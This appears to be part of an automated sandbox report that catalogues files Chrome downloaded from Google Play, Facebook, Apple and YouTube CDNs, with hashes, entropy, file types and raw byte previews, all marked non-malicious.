                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....0x...*..(.>y,.F..!.49.....j...h.i.3#./......7...}../..pv..7.._..?....}....sz..........w.G..._P.._.o...2.......w.'.c.w...../.........?..i.....G....S..z...._......[.[.}~...7...?..#...-..._....a.;...G.?.z...h.......;..................C.._p......~j~..E......................._..,.......o.'./........~...W...g.............w...K./.....e.g..2........./. ...C@...pf....R$..G..f."..`Js...|FN]~...Q..E...wA...P(g..m...b....Vp.O.}+.L.q.....O.Wo|[[- ..g+bC.z0Yw.8O.....x....C..#J,.....G....|...<.3=.'.B..?4c...]A,.~|...1..1....[{..|.....;...b..w*..N...6..W-5.p.w..v%.7~..*P.!S.G.|!..B.....w)..i..h.F_...'|....`.)... ;."$....T....`.*.&.X....&B7$...'.%eh...F$..L..@....Itg..._..... q....a..#E...J........7...B.......}A...J....W......*................: s.t.GMLADU.z...Hx....41.c......o.^.Fi'.....j.=....K.8m..."....c+....L......=.'..a......p..q....r..3.0i..yO...lcO....bh.g.y.A.....S.>.G_..........!.r"u.{.dy.t. ..n. .:.a..i.~...8....!..4..:DS.kf|q..1.@M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10850
                                                                                                                                                                                                                                  Entropy (8bit):7.975671955265493
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xmG7orlt9U6+7/cWgN2ZPM/wMzJcRFxivdPDSr+Tazqt7s/sgHRKUjfAGAeseF0Y:sOwltaF/pgEZwNcxfrz8s0g8UjfAGZlR
                                                                                                                                                                                                                                  MD5:DF4F4BD424E27B3EEFF5DFF4D4B5A82A
                                                                                                                                                                                                                                  SHA1:00EDCBC57BE597D1431AA7388E91F2DA24DA141F
                                                                                                                                                                                                                                  SHA-256:E929EE6594A82B80C5463DCFD43E675919595DA8E52D097EC52CD709A8E80FFA
                                                                                                                                                                                                                                  SHA-512:8BB27E44C60312587C143E0F83F4CDB1DBCF8532E49408C03DCBA3D3C6DFC5EE4679B9E8F9E98C9876F3653450B9FC663AEB2E44B65031BC0F159236DD3147E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFFZ*..WEBPVP8 N*.......*..(.>]$.E#.!.Z..8...8....9....................?........G.......?G............j?.?.........{......e......._Z/............'.....?.....7.......o......@?.u..S..l...(|..c..k?..k.}.;...z)..........'.#.?...z..9.......OV].........}O.O.O..I......G.7...g./.....>j.I...c...g>.?..^.s.....O.?M.....K.c..?.?.?.~S...-.......O....n..?...b..~... .*... ]...U'.......1...-.........(.G1M.(.Q...%......7v.6...AX..61..[.e0....j...m0C..;0.!........Q....c.-.T...q.9..s........$E..!..f...O.-....9....~fc.?....#......}.d.}d.g..4mDs.2.F..r...b.H....:..q......k`?..f........&...]4.... .u.l.)...X]..u.E}}.u..d.......R....u..s..|...`.)=.<P......t.HpA.b...._f..A)..z..2.v..).w)r.4.P.jb:.....o..k..YC....7....P..|.....FoaR...v..nS>...-.W|..,~H......5...b\.a..........YlM(.`/.q.H...H^..IS8.E..nj...BI.....Ll.QWtJ|.h|.Xp.{a.,kK.e(....T..<..2*$...W}.v.".G.%.!..G."...O.:..k..\..R..g.Jo.....!I4....[.......B..df.......Q..p.l.K.......y{B{>....y.{..>Y$....L
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):231862
                                                                                                                                                                                                                                  Entropy (8bit):5.4580370109650715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:5fLeYH8At6JK37OeR8NteGvQ+AMPpgArl0xYu5s713hW:5fLeYc+6JaH8N7QQGArHu5s713A
                                                                                                                                                                                                                                  MD5:3E34065323CCD70417621B0687E56775
                                                                                                                                                                                                                                  SHA1:F63D803164D63317D51A708C942FF511725A9E16
                                                                                                                                                                                                                                  SHA-256:5EBCE957851EB83517851E8613F012EB45AA4EBB6142B92C30B7D9492C874E22
                                                                                                                                                                                                                                  SHA-512:EDB02D4A93A15771FB0768C8A45F3DBAF0908E5C450737D59AF5804840B10E33C0955831B4B6B3F3362A839CC8DBEF2169667F4FDFB40299FDCB80E8A16051EA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4083)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):4295
                                                                                                                                                                                                                                  Entropy (8bit):5.30261790907087
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:xqYiUs0iqHjly3HHe+F03J8ZwEuSs86tBjjHyRC:kjVRqZy3xF03J6ZuSsJvXD
                                                                                                                                                                                                                                  MD5:65751269352F5C7FF3E35C83A025E2CE
                                                                                                                                                                                                                                  SHA1:BEC653BBE4E1160BC9E36F2A9F105B52842883C5
                                                                                                                                                                                                                                  SHA-256:14F90CE2F1A178960CE7F253D6FC129D6D0C844600947E9D8CBCE565F88C898E
                                                                                                                                                                                                                                  SHA-512:E44A09A92CFDF22D30E8BBACFAB25FACF64CD519C5596DF3D18D5AAD0D8FC21352293B02320ECADE7B444BB6097A01B679F27686E8CD4726B895BD358158082C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/C5TXdJzIETO.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);.__d("DOMScanner",["Base64","ConstUriUtils","DOMScannerConfig","FBLogger","JSScheduler","Promise","WebStorage","XDOMScannerResultsControllerRouteBuilder","cometAsyncFetch","isFacebookURI"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j,k=0,l=!1,m=!1;function n(a){return a.startsWith("data:")&&a.includes(";base64,")}function o(a){return n(a)?!1:q(a)}function p(){var a=[],b=document.getElementsByTagName("*");for(var c=0;c<b.length;++c)b[c].shadowRoot!=null&&a.push(b[c]);return a}function q(a){a=d("ConstUriUtils").getUri(a.toString());return a==null?!1:!c("isFacebookURI")(a)}function r(){var a=[],b=p();for(var c=0;c<b.length;c++){var d=b[c],e=d.getBoundingClientRect();e=JSON.stringify({position:{b:e.bottom,l:e.left,r:e.right,t:e.top},size:{h:e.height,w:e.width}},null,2);a.push(["s
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):531735
                                                                                                                                                                                                                                  Entropy (8bit):7.9959618690291485
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:12288:3ZO28m/+3VAhiP0YszzUgIfq8mENyADyi5ROgo4S66uOz2YJ:oOaAhiPszggIfhUMC4S6QB
                                                                                                                                                                                                                                  MD5:87058841D0FF116A9BFD50E97A895A80
                                                                                                                                                                                                                                  SHA1:80BFBF60B2BBEC7C20122830D70E301AA7954B2F
                                                                                                                                                                                                                                  SHA-256:7CD1EF55DFFF1933D37D1490FD792A77E604EBF0DD34E3082B184B2951B50F44
                                                                                                                                                                                                                                  SHA-512:7FF1C6CD6AC8EE91FECA1E39659466AE016BF602C3C16830FDCD3F3A83D177678A4391D76419418A0C9CDF28A9F7773139D95BDDB682A3EEA5571B0935279B82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-games.googleusercontent.com/vp/mp4/1280x720/KHfEG-2pIEI.mp4:2f81d12a9772bb:0
                                                                                                                                                                                                                                  Preview:....ftypisom....isomiso2mp41....free....mdat.I.B.O.,..8$.........5.....G...........}....5.~.?.._..~/..}O.....l.G.7d Q..:.....|o...w..3?.T...d....>\^.....M.8...};..9..^....t...S.x..........?............|...1o..../Q.q.}.Q.~...._../..Vo}..4F..{.g_.o]..;x.c..+F.k...>..w_..G....r.;JE..d..x7......_.@.....d........~~k.-...y......O.r..Z.!.M*2>.o._..@S.H.....)..T..=...sP...Bd>W..2...t~kk<..j.].)..b(xe..P..~.(..U......7...L.....$cv....ML#...w....M[.\..P..^.W.%.N_...lTeA.n..U..._F2..r..K.Fb+KN..n.7/y.).'&..HCuzx.......M..i..?.)*..2{.K.$.....i...&..=X.:t.A.Kg.....Kn..4FZ.D.1..B.=B............q...8A..................d.F...?=...b..,..l..6..rs.....t...w_H.........t.Zu.G..%.....7.7m..y..8kI.UL.7.(.&.>...p....b.=5I..=...;O..f..'.........C....xA......c.0;..;Sx.:)#a.o...M.....B$..Z.f...y....I.o..#..'q6#.}Fp..A.!HID.1..1./..........d0g|.`.?..b.Z..^...>..k....D.*...ne.^.64...Q...........rrtZ...vZ(..5l.p.c...,/C.C..p.g.Y..........c..;..!`..zPh..$.....M+.J
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9270
                                                                                                                                                                                                                                  Entropy (8bit):7.973786790952994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:IIjELAJ6wo3pBvjZZXqtHxxZsMSqfQ5XHfJ889UqDw/GAmd:IIj+A4xdsfxX+OzSd
                                                                                                                                                                                                                                  MD5:664690CC29246D3BB6257D8E7F790343
                                                                                                                                                                                                                                  SHA1:19559A7E8B91BAD19798AC44BECBD3E376281CAD
                                                                                                                                                                                                                                  SHA-256:2441EFA89E8D41238794A3C53F1223161A222B212CE6BFBF57B0E26BE9F4D0C8
                                                                                                                                                                                                                                  SHA-512:835699F095AC4078A71F64903463D035E55D4D687B7C79991EDDB2B1A660A2F79A5ED0BDF1CC58D9D9DAD1D5BD25C12F38128ECE07478616FA768EF63F8C2517
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/pQqL4JTm_4PS4UGdvVNnv4f0AYXeRwItrhlAhu84_jtUO-xslQmRaHgrJouYh82OPps=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF.$..WEBPVP8L"$../?...M(l..Ar...G.G{..c..m.{.R...?..6.D..^0n#IQ.C...?.....n.p[...E.N.._..E...m#I.....>...........wb...3+#.nfs.../..e.........9_......[+.0..a{{..a.\s....IND.Z.....|..r.<./..}....#.S.h.S....^H~w...G'..pS......a<....D...,.%....m.j+g.s...b.0s.jH8iN..U........`[...Cn.L..c.s..}?/~.Q..Hgu.E...O.....N.$9.......9....p.pP..|.......P.2.1..<..h6.}.q....N.;...k..m.m....}]k..v.F.s.q...O#I..$.#.\....5..\.......m.Kwffff.ff..*..#3..0I.{...m....*U]...=....m.m.m..Y..rM....+.Jr..yD\..9..J..".oz~,D..xC....^..5..u^|..|.......;.x}...:+=&..li.he.I..E..~......".'..].R..{...w@..*6...%...J.27w.b=.h.A.N7...X..Q`..M.E=.HQ...R. .Hz/ .f.... .jM.p...._?..Q:h|1.KZ.U.a....0|..9.B?.B.^.. ....CH...&N.*....@..D.@.L....o.......1..R...r.!2...z^_sG..@..c>u..b...i....8B{)[e.]..~.w.l........q.U....4*(.B..wB#8DZ%.&.y...)+.k.mjx2q.E.5q...*.4:.F....]..'.....Td.....{.Gw.T....:..."..yk.W|....5o.*...;....q.kTB.I....@.....Yl.8.1c..%.&.-.P.H....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):14794
                                                                                                                                                                                                                                  Entropy (8bit):7.85884972263365
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Ku1SOiiT5xO5whqd7ZDqH9r3+RDr39ij+SJKz21HkEqrGpgrBLX1LiwcfA8prieS:KyiiOlZDqHp3mFmA2JGTkrPUsyZ
                                                                                                                                                                                                                                  MD5:8BD59F83CF567F3B53AAB2210AD005BD
                                                                                                                                                                                                                                  SHA1:6B26EB197AEED18972DA809E1BCA662EE341FB1C
                                                                                                                                                                                                                                  SHA-256:224BF5CAB51A7AD34AE707BCB5B0FB8E1F44D7A1547E5C59961F72FD58551EFF
                                                                                                                                                                                                                                  SHA-512:331751DBF5FCB0AB5EDDF1D8129382D929687F32A5B468AD15157D26F9CAF3360D60BB445B7C5F3BFF67B411CC375E4753B84B3842AB75B2967A49987BFC7A9F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/a21q6qqmc1E/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF............................. &.... %. . .'10-'-+5=PB58K9+-EaEKSV[\[2AemdXlPY[W.......0..0_B7=WWW]Z]W_WWWWW]WWWWWWWWWWWW]WWWWWWWWWWWWWWWWWWWWWWW......h....".......................................>........................!1AQ..."Raq....2....#B..Sr.3b..$C................................2.........................!Q.1Aa.."2q..3.#..BR...............?..........................................................................................................................................:}.W..w.;........N........u|P...............g0.>.....W..w.0T.g....S.......aU.C....:...r.....*~....W.O._..N.z}..u;.......`..S....S...g,.^..../....T...F.....9@...o.?y|...../...C=>.P:.w.x....v.o.?y|..:...r.....*~....[.O._..N.z}..u{.......`V.S....S...g(.^..../....T...0T.g....W.+x....v.o.?y|..:...r.....*~...w.x....`...O.......*~...w.x....`...O.......*~...w.x....`...O.......*~...w.x....`...O.......*~...w.x....`...O.......*~...w.x....`...O.......*~...w.x....`...O.......*~...w.x....a...O.......*~...w
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):346530
                                                                                                                                                                                                                                  Entropy (8bit):7.987918693945807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:hMciSfjrhhuG6jyErl8NxZfwoBBqjRSVAuUqQfHoTYjGfo8+VFNJDqf78623:hhfxhudjHl8N7Ic2UeqQhGyrv6Y
                                                                                                                                                                                                                                  MD5:8D0C6C0AF04F75202D50CA150B42546E
                                                                                                                                                                                                                                  SHA1:600F8D39B0104237772F939499467E7836210421
                                                                                                                                                                                                                                  SHA-256:FC46AE746F124797BCEAB8E353C334477C2695FC2B4E1217719444BD86E6DB89
                                                                                                                                                                                                                                  SHA-512:E00DB5815E83F0E3D75F4F08D729120FDB352F85CA045B52E0F08439722A16EAEBE41C38A5AE3C94D01B5BD7E327E899FE3FC0AC23110F0BFC4FCFF6962DD89A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.I..WEBPVP8L.I../..Z..@l$9l..'..W.`JI........t......&..T.c...*r#.~..='.)..O..D.U.L.e8.H|....x>..<o..(e...-O...... IT. ..F..O^}AD...y.dWF$_%(..!..#..'j.?c.vW..w.I..J.s..q.9.+..o.3A.S}L..d{..{. ...|=.d.....[.*B'.tcU.3ws.f.(S.0..1*m..._.B......}?&&Iww.W..L@..e..yU...Y.X....1YIn.D..b...D.\...0..sr..G...3.[d.>6...wq.nat+...c..W..60.>.f`.%.z.....e.g|..Z.W..%....m..B.#.1"=9.....{..]1._.3.a..f.f...9.".^.e...P*.4.....|..^......3.=.l..*Ro......t1. .yn%....|...m...>H.3/.......oO..t0pcL..`..}..#...56.....h....,\I.E..v....{+...}....WB..........6H..wk......~.(1%k2.aW.......E.....?^..Y..P..s}...&..RIf6...7C..L6.[....j.9..R.l........x..Q....-.........e.....d.y..]xL..>..C...V..1...H...mw7.y/..>.9K=K.b.......Y.2o.}....iK.....zM...J.....C..GR!.ld.a.=F.....4d......zM....x.t5...SX.L....d.d....U.....|.I.x...n/uK.x...|.).C.....E)...tE.XI.p..GZ.-O&..N.=.+.....,e..jy...U..os.9/k.o..y+y.zy....5.....T.E.....1...vL.N9...cH.L..#.R+U.^.jY{.e....-.>.f...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):7860
                                                                                                                                                                                                                                  Entropy (8bit):7.955805602659907
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LOV54+q/rQD1YSiWl2/05YdNGBhK/saP1FH:LOV5MkD1ZiWl8tzYhYP3H
                                                                                                                                                                                                                                  MD5:46170B933402D7FAFD745DC0CEF0F062
                                                                                                                                                                                                                                  SHA1:239B021E0FE588B2EA6875F584E46F1B09A53E9A
                                                                                                                                                                                                                                  SHA-256:5059ED15F42F09678D74EF63726867324485A18A42A7283A4C0004EA6376CBE8
                                                                                                                                                                                                                                  SHA-512:5E6E9B8B92731A6533365CA6CAD8222F907F02FAC571700BC67145560842D9A9AC4C1EFF10327ED17245220DF14ECDAA0BF1BB4FFCBF0AB0BEF123E7ABEEAE9A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/FVQXdzxDphpLdMRqIc5kG4C_Dc4AEO7-9uKHPt85v5_6Sp3J4mTV1S6P3ipLEoK6lDer=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X........?..?..VP8Lc.../?...M0h.H.6.?...........v~..<...I..wP=..4.I..m#I...|].1..4.8...T...B...PCw"w.2..HR..c...'3.?.....V..... ...6....0..6..f.7.oX...L..n....s.<..k....|....y...~....G_.......M...N..CA.6....v.......v%K.3..m...1.>..o...h..P"..T=.+.....g@....9{.5.{Q.K....2.......lD.....h..l.o.Q.......].j+.c.s.........A..9.{..'....G.?s..,.A.A!.K....m....!..m;$I..8......bwUW.3s.m.m...m.]Yi.N.K_."..m.m[.Vj.}L-l..}...m.V...?..zl.m...hk.&..UO.m.nlk[.c.dI.P..\fffff....)f....rs....."....di.9z(L...+ ...CC.X.!...JTj......H..&.....x).v....uK...e1v.o.So...4....".........B.B.....-.*.C...........1..0...l..RV.X&.).`.f.l{c\(X.P..VZ..P..@C...x.iy...`.g......-.W*.R8..2..R.....T. 9=t.~.!B.a..LT....N.X.)..Lb...p^}.2.2.."..V%PK..V...9.z..3...... .#h......./p...C0. L.(.0:. ..^H.}...E.p...(@$....!.....z4.@....(`Q.IB[.(...).....Qn%..#....^_.....`.N.I!e2..S.r...hI..W...O.y.....a.5%.......eL.[.]..Q7.P.."."....%.""...);f...8...$.$..b..'9...x.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2634)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9946
                                                                                                                                                                                                                                  Entropy (8bit):5.303383252274076
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NdbWsWxwiKpBpVyPPjg9bt9MVzclvs4oRL19n3kufDi/9secuFjel:LbWsWx3KDXR9THl1iL1l3kufG/9sebjS
                                                                                                                                                                                                                                  MD5:9BB28E4E947B15C91F9178EFF5B23264
                                                                                                                                                                                                                                  SHA1:87F5AC3AE29A7455DD00F79435B1D91F664F0395
                                                                                                                                                                                                                                  SHA-256:9FEC8921027F561C8BD0FDF17C244E35F26ABA8E336571597FCCCD9D42D7A0CA
                                                                                                                                                                                                                                  SHA-512:4566D611CDC37D0F4C34D36ABA45AF69036C4A9E155FAAEC80D70B20C24555A319C8227377D9AA7E7EF02077C2E83C050DB8BACCDBF48417D8772F64818AA7A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.722.c70bd733e7b77d8198f0.js
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[722],{32722:function(e,t,i){var n=i(24178),r=i(76588),o=n.SC.attachDelegate,s={setDelegate:function(e){return o(this,e)},localStorageObject:n.tO.localStorageObject,sessionStorageObject:n.tO.sessionStorageObject},a=n.SC.attachDelegate,c={setDelegate:function(e){return a(this,e)},makeAjaxRequest:n.L5.makeAjaxRequest},l=n.SC.attachDelegate,u=n.SC.hasAnyKeys,p=n.SC.isArray,h=n.tO.saveObjectToStorage,d=n.tO.objectFromStorage,g=n.P0.exponentialBackoff,f=n.EE.valueForKeyPath,S="noTopicConfig",v={blacklistedFields:["capacitySystem","capacitySystemAvailable","capacityDisk","capacityData","capacityDataAvailable"],compoundSeparator:"_",configBaseUrl:"https://xp.apple.com/config/1/report",constraints:{profiles:{AMPWeb:{precedenceOrderedRules:[{filters:"any",fieldConstraints:{clientId:{generateValue:!0,namespace:"AMPWeb_isSignedOut",expirationPeriod:864e5}}},{filters:{valueMatches:{isSignedIn:[!0]}},
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6544)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):13393
                                                                                                                                                                                                                                  Entropy (8bit):5.410452822445596
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6cJVUw5yrnVinZnt250Jrxr0UYrAmKRdeiTzVl7v2Vpfd2A2Ks6DBPjbTUDwCFVW:6SnWVinZnSO355zXv2Vpfd2A2Yjn
                                                                                                                                                                                                                                  MD5:9512B522526C50D8D6A8BDFE73A720A0
                                                                                                                                                                                                                                  SHA1:0233D6921F5694C7599DAADDBFADBD65C9248068
                                                                                                                                                                                                                                  SHA-256:42264DFE70407A2AEFA31B4286D407B44DC9CAA4D61F59637908D1ECED68F595
                                                                                                                                                                                                                                  SHA-512:F3A2EEA8EA2A762106B3FCBF1562ADB93D3E68BC573EEE7BA6B6D2581B8E7C604CCF0ADBB65A7E5028BB59EB9130E07C8B11A9937A2CC968D85213229A383968
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/RedpCkzOAc2.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractSearchSource",["Promise"],(function(a,b,c,d,e,f){var g;a=function(){function a(){}var c=a.prototype;c.bootstrap=function(a){var c=this;this.$1||(this.$1=new(g||(g=b("Promise")))(function(a){c.bootstrapImpl(a)}));return this.$1.then(a)};c.search=function(a,b,c){this.searchImpl(a,b,c)};c.bootstrapImpl=function(a){a()};c.searchImpl=function(a,b,c){throw new Error("Abstract method #searchImpl is not implemented.")};c.clearBootstrappedData=function(){this.$1=null};return a}();f["default"]=a}),66);.__d("ExplicitRegistrationReactDispatcher",["ExplicitRegistrationDispatcher"],(function(a,b,c,d,e,f,g){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var c=b.prototype;c.dispatch=function(b){a.prototype.dispatch.call(this,b)};return b}(c("ExplicitRegistrationDispatcher"));g["default"]=a}),98);.__d("LayoutColumn.react",["cx","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j=i||d("react");b=j.forward
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):32158
                                                                                                                                                                                                                                  Entropy (8bit):7.992938037945725
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Rdcx/CagYi1InvBYlF7/L6rypHDKpxRhRgr4UY:Rdcx9Pi1InZY3/L6rWWzjRxV
                                                                                                                                                                                                                                  MD5:27A494AE47AB729D7606585B2ABD52B7
                                                                                                                                                                                                                                  SHA1:708AA4B916ACC09647E8EB1B9807F84C3EA94CAB
                                                                                                                                                                                                                                  SHA-256:593192A96FDF5A7A5ECDC181AB93083F21326F98ABA8E639C529336C4B693509
                                                                                                                                                                                                                                  SHA-512:902F63F18E6DDCA0A946EECEEB1CFC28AE6180040BF32D72145D070B873357866CBEA9D753EFF72DCEAC081BBCD20FF47F671712289E9620838505C105C81CCE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/3Fbi4a9x3z4i_xH8NrC_bSC2m3SPu7Bqj0pW68MHg6AoqCi-pfZLchig4c4DwPA-EGo=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.}..WEBPVP8X...........'..VP8 N}..px...*..(.>m,.F$"!./6....f....X.Z;....$9'...~/.g...{S...~f......Z...k=.._.M...3...g..^o.|.....h.e}......Y.K.....W.....=.=[=.?j=9.o..|..{....._.......7.....|../../...._.....~.x..;Q..g....._.............?.._....=....G./....'.....O....5.....~._..........g.7.?.~.|..:...c..........8..............?......+.....g......f.s...A......().X/.7.J.,......3..k...r.....m...&.g..1...2.o.O;`......._R...x.Y....>Q........>1.LV..#*..b..:..~.f.k..M.......{.T...2...,0...@..~..`.z.......=.R..FtoGSd...fH..}#y..%...:.f.....u..d..|1.D_.%C..p7.d...>R..\.U...m......I..`K..GC...Zb....Q.S..S.$V;.........;...wu..Cv..H.........`.(.y.2m...Xk..N.-.1..J......@a;m.OB..42;v..:...v...n.Zf..hz.t..(zz$'^.l.j .b."...Z..}..I_<.lr.Df........|e..H.#......?.?.9..a..a.K8.1..l....1...n...h....)i.f.".B.u.>D.d.Q..C.'B../...i....1`...VN.B......)._.........wg..XbgD....4..<..a..P]....{.#..e...?....o..w..z.l..@e..{..!J....L....................D$.*...p$.K.a....F.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.177086708140499
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnsnSolJeEQAuGNG/QVIt0M5hiBJUp4MwQRaNw6JpyxZRNlad0:kRZTFDKJeEvI/AICMTiBJ9RkbRN20
                                                                                                                                                                                                                                  MD5:3D78A189B1D66AD742D353E6ACD48ECB
                                                                                                                                                                                                                                  SHA1:85E7A7061F6604B82C746746BA09F6F6EEE6BDE0
                                                                                                                                                                                                                                  SHA-256:690B5AA5CDD7A9E914EB66151ADA81AADD967705C490B07B923B8B898C3F5B10
                                                                                                                                                                                                                                  SHA-512:2B89117554262AE4666FF089682B10D5E6EEF3C64306A1CABC908C47C4EC405BDDCF9DE05C235607385F3A2F20782B80E93D1372E5ECE4809D6D486EBAB732E2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
